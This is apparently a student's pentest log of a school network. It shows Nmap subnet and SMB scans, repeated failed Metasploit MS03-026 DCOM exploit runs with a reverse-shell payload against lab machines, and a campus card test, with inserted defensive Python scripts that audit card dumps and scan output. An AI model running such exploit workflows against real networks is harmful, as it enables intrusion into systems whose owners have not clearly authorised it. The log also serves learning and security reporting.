2.11.10:28
Preliminary note: the "intrusion" here means testing for the relevant vulnerabilities (no actual intrusion or attack is carried out), and the findings are reported to the relevant school departments afterwards. Of course, if you are a fellow student at my school there is no need to try this again: once a vulnerability is found it gets reported to the school first, and only then written up.
Since I don't know whether this will succeed, I'll write as I go.
For this pentesting study I specifically bought a handheld computer running Kali, a projection keyboard and a Digispark development board. (Of course, our high school doesn't allow phones inside; all of the testing here was done during the school holidays.)
Pentest approach
Using a BadUSB
Kali MSF-based penetration
Port-related vulnerabilities and their exploitation
A remote server is needed
Scan the subnet with Nmap from Kali in the computer lab.
Note: permission is requested from the school before testing.
Testing the campus all-in-one card: since the school cafeteria uses the all-in-one IC card, I plan to test it.
The card is from the Smart Campus Card (智慧一卡通) system (PN532)
![](https://img-blog.csdnimg.cn/img_convert/6f5c83716ed5271bd7fe3d22b554007c.png)
Below is some of the data recovered during the test (from the meal card and the water card), for study purposes only (I won't go into exploiting the vulnerability or brute-forcing the IC card here, to prevent misuse).
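As an added example (not code from the original post), here is a Python audit of a MIFARE Classic 1K dump in the same text layout as the author's sector dumps: it decodes each sector trailer's access bits and flags factory keys, the factory "transport" access configuration, identical A/B keys, and one key reused across sectors. The sample dump is constructed, not the author's card, and the 1K layout (16 sectors of four 16-byte blocks, trailer in block 3) is an assumption that matches the dumps the author posted.

```python
"""Audit a MIFARE Classic 1K dump for weak key management (added example)."""
from __future__ import annotations

from dataclasses import dataclass

# Constructed sample in the same text layout as the page's dumps (a header
# line per sector, then four hex lines). Sector 0 is left in the factory
# transport state; sector 1 has custom keys and restrictive access bits.
SAMPLE_DUMP = """\
sector 0
01 02 03 04 04 08 04 00 62 63 64 65 66 67 68 69
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff
sector 1
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 03 e8 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
11 22 33 44 55 66 78 77 88 69 aa bb cc dd ee ff
"""

WEAK_KEYS = {"ffffffffffff", "000000000000"}  # factory transport key, all-zero key
TRANSPORT_ACCESS = b"\xff\x07\x80"             # factory access bits (bytes 6-8 of the trailer)


@dataclass
class Finding:
    sector: int
    issue: str


def parse_dump(text: str) -> list[list[bytes]]:
    """Collect every line of 16 hex bytes and group them into 4-block sectors."""
    blocks: list[bytes] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 16 and all(len(p) == 2 for p in parts):
            try:
                blocks.append(bytes.fromhex("".join(parts)))
            except ValueError:
                continue  # a 16-word line that is not hex
    if not blocks or len(blocks) % 4:
        raise ValueError("dump is not a whole number of 4-block sectors")
    return [blocks[i:i + 4] for i in range(0, len(blocks), 4)]


def access_bits_consistent(b6: int, b7: int, b8: int) -> bool:
    """C1..C3 are stored twice, once inverted; the card locks the sector if they disagree."""
    c1, c2, c3 = (b7 >> 4) & 0xF, b8 & 0xF, (b8 >> 4) & 0xF
    return (b6 & 0xF) == (~c1 & 0xF) and (b6 >> 4) == (~c2 & 0xF) and (b7 & 0xF) == (~c3 & 0xF)


def decode_access_bits(b6: int, b7: int, b8: int) -> list[tuple[int, int, int]]:
    """Return (C1, C2, C3) for blocks 0..3 of the sector; bit i of each nibble is block i."""
    if not access_bits_consistent(b6, b7, b8):
        raise ValueError("access bits fail their complement check; the card would lock the sector")
    c1, c2, c3 = (b7 >> 4) & 0xF, b8 & 0xF, (b8 >> 4) & 0xF
    return [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]


def audit(sectors: list[list[bytes]]) -> list[Finding]:
    findings: list[Finding] = []
    key_a_users: dict[str, list[int]] = {}
    for n, blocks in enumerate(sectors):
        trailer = blocks[3]
        key_a, acc, key_b = trailer[:6].hex(), trailer[6:9], trailer[10:16].hex()
        for name, key in (("A", key_a), ("B", key_b)):
            if key in WEAK_KEYS:
                findings.append(Finding(n, f"key {name} is a well-known default ({key})"))
        if key_a == key_b:
            findings.append(Finding(n, "key A equals key B: no separation between read and write roles"))
        key_a_users.setdefault(key_a, []).append(n)
        try:
            bits = decode_access_bits(*acc)
        except ValueError as err:
            findings.append(Finding(n, str(err)))
            continue
        if acc == TRANSPORT_ACCESS:
            findings.append(Finding(n, "access bits still in factory transport configuration"))
        for blk, cond in enumerate(bits[:3]):
            if n == 0 and blk == 0:
                continue  # manufacturer block (UID) is read-only on genuine cards
            # C1C2C3 = 000: either key may read, write, increment and decrement the block
            if cond == (0, 0, 0) and any(blocks[blk]):
                findings.append(Finding(n, f"block {blk} holds data yet is fully writable with either key"))
    for key, users in key_a_users.items():
        if len(users) > 1 and key not in WEAK_KEYS:
            findings.append(Finding(users[0], f"key A reused across sectors {users}: one recovered key opens them all"))
    return findings


if __name__ == "__main__":
    for f in audit(parse_dump(SAMPLE_DUMP)):
        print(f"sector {f.sector}: {f.issue}")
```

A trailer of `ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff` reports both default keys and the transport access bits, i.e. the sector is readable and rewritable with the public factory key.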
Below is the data from the scan run on Kali in the computer lab
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:07 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.2
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.3
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:6D:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.4
Host is up (0.00019s latency).
MAC Address: F4:4D:30:51:D7:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.6
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:13:A8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.7
Host is up (0.00015s latency).
MAC Address: F4:4D:30:51:16:E3 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.9
Host is up (0.00034s latency).
MAC Address: F4:4D:30:51:16:E0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.11
Host is up (0.00073s latency).
MAC Address: F4:4D:30:51:C5:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.12
Host is up (0.00054s latency).
MAC Address: F4:4D:30:51:15:F6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.13
Host is up (0.00030s latency).
MAC Address: F4:4D:30:51:15:F7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.14
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:70:FC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.18
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6C:B2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.22
Host is up (0.00082s latency).
MAC Address: F4:4D:30:51:14:BC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.23
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:15:E5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.24
Host is up (0.00075s latency).
MAC Address: F4:4D:30:52:1E:78 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.26
Host is up (0.00021s latency).
MAC Address: F4:4D:30:51:15:4A (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.27
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:12:A6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.28
Host is up (0.00098s latency).
MAC Address: F4:4D:30:51:12:A4 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.29
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:71:D9 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.31
Host is up (0.00020s latency).
MAC Address: F4:4D:30:51:6C:5C (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.32
Host is up (0.00015s latency).
MAC Address: F4:4D:30:52:1E:DD (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.33
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:6D:E7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.34
Host is up (0.00025s latency).
MAC Address: F4:4D:30:51:13:A7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.35
Host is up (0.00072s latency).
MAC Address: F4:4D:30:51:14:12 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.36
Host is up (0.00070s latency).
MAC Address: F4:4D:30:52:21:36 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.37
Host is up (0.00016s latency).
MAC Address: F4:4D:30:51:6D:A0 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.38
Host is up (0.00056s latency).
MAC Address: F4:4D:30:51:12:B6 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.39
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:14:AC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.40
Host is up (0.00079s latency).
MAC Address: F4:4D:30:51:6D:EC (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.41
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:14:B8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.44
Host is up (0.00067s latency).
MAC Address: F4:4D:30:51:6D:56 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.45
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:71:D5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.46
Host is up (0.00012s latency).
MAC Address: F4:4D:30:51:6C:44 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.48
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:71:72 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.49
Host is up (0.00053s latency).
MAC Address: F4:4D:30:51:6C:80 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.51
Host is up (0.00069s latency).
MAC Address: F4:4D:30:51:13:2F (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.52
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:71:E1 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.53
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:8F:77 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.55
Host is up (0.00074s latency).
MAC Address: F4:4D:30:51:6E:AF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.58
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:6C:6B (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.61
Host is up (0.00080s latency).
MAC Address: F4:4D:30:51:17:D7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.65
Host is up (0.00078s latency).
MAC Address: F4:4D:30:51:71:E2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.67
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:94 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.69
Host is up (0.00076s latency).
MAC Address: F4:4D:30:51:6D:CF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.70
Host is up (0.00018s latency).
MAC Address: F4:4D:30:51:6D:BF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.71
Host is up (0.00025s latency).
MAC Address: C4:70:AB:63:44:8E (Ruijie Networks)
Nmap scan report for kali.lan (192.168.2.208)
Host is up.
Nmap done: 256 IP addresses (47 hosts up) scanned in 5.66 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:12 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00040s latency).
Not shown: 8885 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 22.55 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:17 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00035s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|8|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:23 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00025s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:27 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00030s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
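To turn scan output like the above into something a defender can act on, here is an added Python example (not from the original post) that parses nmap's normal output into per-host records and flags hosts with SMB (139/445) reachable on a Windows family that is out of vendor support, which is what the OS fingerprint above suggests for 192.168.2.1 (nmap itself warns that fingerprint may be unreliable). The sample scan text, its MAC addresses and vendor strings are constructed; the end-of-life list is an assumption used only for prioritisation.

```python
"""Summarise nmap normal-format output into per-host exposure findings (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample mirroring the shape of the scans on this page: two hosts,
# one with SMB ports open on an old Windows build, one with a single SSH port.
SAMPLE_SCAN = """\
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:17 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00035s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:11:22:33:44:55 (Constructed Vendor)
Running: Microsoft Windows 7|8|Vista|2008
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap scan report for 192.168.2.71
Host is up (0.00025s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:11:22:33:44:66 (Constructed Switch Vendor)
Nmap done: 2 IP addresses (2 hosts up) scanned in 13.95 seconds
"""

# Windows families whose vendor support has ended (assumed list). A match is a
# prioritisation signal, not proof of a vulnerability.
EOL_WINDOWS = ("Windows XP", "Windows Vista", "Windows 7", "Windows 8", "Windows Server 2008")
SMB_PORTS = {139, 445}


@dataclass
class Host:
    ip: str
    mac: str = ""
    vendor: str = ""
    open_ports: dict[int, str] = field(default_factory=dict)
    os_guess: str = ""
    scripts: dict[str, str] = field(default_factory=dict)

    def exposed_smb(self) -> bool:
        return bool(SMB_PORTS & self.open_ports.keys())

    def eol_windows(self) -> bool:
        return any(name in self.os_guess for name in EOL_WINDOWS)


# "Nmap scan report for 10.0.0.1" or "Nmap scan report for name (10.0.0.1)"
REPORT = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?$")
PORT = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
MAC = re.compile(r"^MAC Address: ([0-9A-F:]{17}) \((.*)\)$")
SCRIPT = re.compile(r"^\|_?([\w-]+): (.*)$")


def parse_nmap(text: str) -> list[Host]:
    hosts: list[Host] = []
    for line in text.splitlines():
        if m := REPORT.match(line):
            hosts.append(Host(ip=m.group(1)))
            continue
        if not hosts:
            continue  # banner lines before the first host
        cur = hosts[-1]
        if m := PORT.match(line):
            cur.open_ports[int(m.group(1))] = m.group(3)
        elif m := MAC.match(line):
            cur.mac, cur.vendor = m.group(1), m.group(2)
        elif line.startswith("Running: "):
            cur.os_guess = line[len("Running: "):]
        elif m := SCRIPT.match(line):
            cur.scripts[m.group(1)] = m.group(2)
    return hosts


def exposure_findings(hosts: list[Host]) -> list[str]:
    """One line per host that needs attention: SMB reachable on an end-of-life OS."""
    out = []
    for h in hosts:
        if h.exposed_smb() and h.eol_windows():
            ports = ",".join(str(p) for p in sorted(h.open_ports))
            out.append(f"{h.ip}: SMB reachable on unsupported OS ({h.os_guess}); open tcp {ports}")
    return out


if __name__ == "__main__":
    for line in exposure_findings(parse_nmap(SAMPLE_SCAN)):
        print(line)
```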
┌──(root㉿kali)-[/home/kali]
└─# msfconsole
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search dcom
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/nimsoft/nimcontroller_bof 2020-02-05 excellent Yes CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
1 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
2 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec
3 exploit/windows/http/dnn_cookie_deserialization_rce 2017-07-20 excellent Yes DotNetNuke Cookie Deserialization Remote Code Excecution
4 exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Yes MS03-026 Microsoft RPC DCOM Interface Overflow
5 exploit/windows/smb/ms04_031_netdde 2004-10-12 good No MS04-031 Microsoft NetDDE Service Overflow
6 auxiliary/scanner/telnet/telnet_ruggedcom normal No RuggedCom Telnet Password Generator
7 auxiliary/admin/dcerpc/samr_computer normal No SAMR Computer Management
8 auxiliary/scanner/http/symantec_brightmail_ldapcreds 2015-12-17 normal No Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability
9 auxiliary/scanner/http/symantec_brightmail_logfile 2012-11-30 normal No Symantec Messaging Gateway 9.5 Log File Download Vulnerability
10 exploit/windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC
11 exploit/windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)
Interact with a module by name or index. For example info 11, use 11 or use exploit/windows/local/ms16_075_reflection_juicy
msf6 > use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options]
[-] Invalid parameter "options]", use "show -h" for more information
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 135 yes The target port (TCP)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
View the full module info with the info, or info -d command.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.208
RHOSTS => 192.168.2.208
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.208:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set LHOSTS 192.168.2.208
[-] Unknown datastore option: LHOSTS. Did you mean LHOST?
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.208
RHOSTS => 192.168.2.208
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.208:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[-] 192.168.2.208:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exit
┌──(root㉿kali)-[/home/kali]
└─# msfconsole
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.208
RHOSTS => 192.168.2.208
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) >
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
RHOSTS => 192.168.2.1
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[-] 192.168.2.1:135 - Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.2.1
┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.2.208 netmask 255.255.255.0 broadcast 192.168.2.255
inet6 fe80::3103:3e0a:d4e8:8ef8 prefixlen 64 scopeid 0x20<link>
ether f4:4d:30:51:d6:df txqueuelen 1000 (Ethernet)
RX packets 93 bytes 16309 (15.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 65 bytes 10441 (10.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root㉿kali)-[/home/kali]
└─# Namp -sP 192.168.2.0/24
Command 'Namp' not found, did you mean:
command 'wamp' from deb python3-autobahn
command 'pamp' from deb paml
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# apt-get install Namp
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package Namp
┌──(root㉿kali)-[/home/kali]
└─# apt-get install namp
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package namp
┌──(root㉿kali)-[/home/kali]
└─# Nmap -sP 192.168.2.0/24
Command 'Nmap' not found, did you mean:
command 'gmap' from deb gmap
command 'nmap' from deb nmap
command 'zmap' from deb zmap
command 'tmap' from deb emboss
command 'umap' from deb libunicode-map8-perl
command 'pmap' from deb procps
command 'amap' from deb amap
command 'amap' from deb amap-align
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# apt-get install nmap
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
nmap is already the newest version (7.93+dfsg1-0kali2).
nmap set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.2.0/24
┌──(root㉿kali)-[/home/kali]
└─# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
┌──(root㉿kali)-[/home/kali]
└─# vim scan.txt
┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.2.0/24
Host is up (0.00077s latency).
MAC Address: F4:4D:30:51:14:B8 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.44
Host is up (0.00075s latency).
MAC Address: F4:4D:30:51:6D:56 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.45
Host is up (0.000097s latency).
MAC Address: F4:4D:30:51:71:D5 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.46
Host is up (0.00017s latency).
MAC Address: F4:4D:30:51:6C:44 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.48
Host is up (0.00023s latency).
MAC Address: F4:4D:30:51:71:72 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.49
Host is up (0.00013s latency).
MAC Address: F4:4D:30:51:6C:80 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.51
Host is up (0.00041s latency).
MAC Address: F4:4D:30:51:13:2F (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.52
Host is up (0.00074s latency).
MAC Address: F4:4D:30:51:71:E1 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.53
Host is up (0.00075s latency).
MAC Address: F4:4D:30:51:8F:77 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.55
Host is up (0.0014s latency).
MAC Address: F4:4D:30:51:6E:AF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.58
Host is up (0.00035s latency).
MAC Address: F4:4D:30:51:6C:6B (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.61
Host is up (0.00081s latency).
MAC Address: F4:4D:30:51:17:D7 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.65
Host is up (0.00081s latency).
MAC Address: F4:4D:30:51:71:E2 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.67
Host is up (0.00070s latency).
MAC Address: F4:4D:30:51:6D:94 (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.69
Host is up (0.00014s latency).
MAC Address: F4:4D:30:51:6D:CF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.70
Host is up (0.00071s latency).
MAC Address: F4:4D:30:51:6D:BF (Elitegroup Computer Systems)
Nmap scan report for 192.168.2.71
Host is up (0.00018s latency).
MAC Address: C4:70:AB:63:44:8E (Ruijie Networks)
Nmap scan report for kali.lan (192.168.2.208)
Host is up.
Nmap done: 256 IP addresses (47 hosts up) scanned in 1.66 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p 192.168.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:12 UTC
Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!
┌──(root㉿kali)-[/home/kali]
└─# nmap -p 1-8888 192.168.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:12 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00040s latency).
Not shown: 8885 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 22.55 seconds
┌──(root㉿kali)-[/home/kali]
└─# unicornscan -r 100000 -m U -Iv 192.168.2.0/24 :1-8888
Command 'unicornscan' not found, but can be installed with:
apt install unicornscan
Do you want to install it? (N/y)y
apt install unicornscan
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package unicornscan
┌──(root㉿kali)-[/home/kali]
└─# Unicornscan -r 100000 -m U -Iv 192.168.2.0/24 :1-8888
Command 'Unicornscan' not found, did you mean:
command 'unicornscan' from deb unicornscan
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# Unicornscan -r 100000 -m U -Iv 192.168.2.0/24 :1-8888
Command 'Unicornscan' not found, did you mean:
command 'unicornscan' from deb unicornscan
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# apt-get install unicornscan
Reading package lists... Done
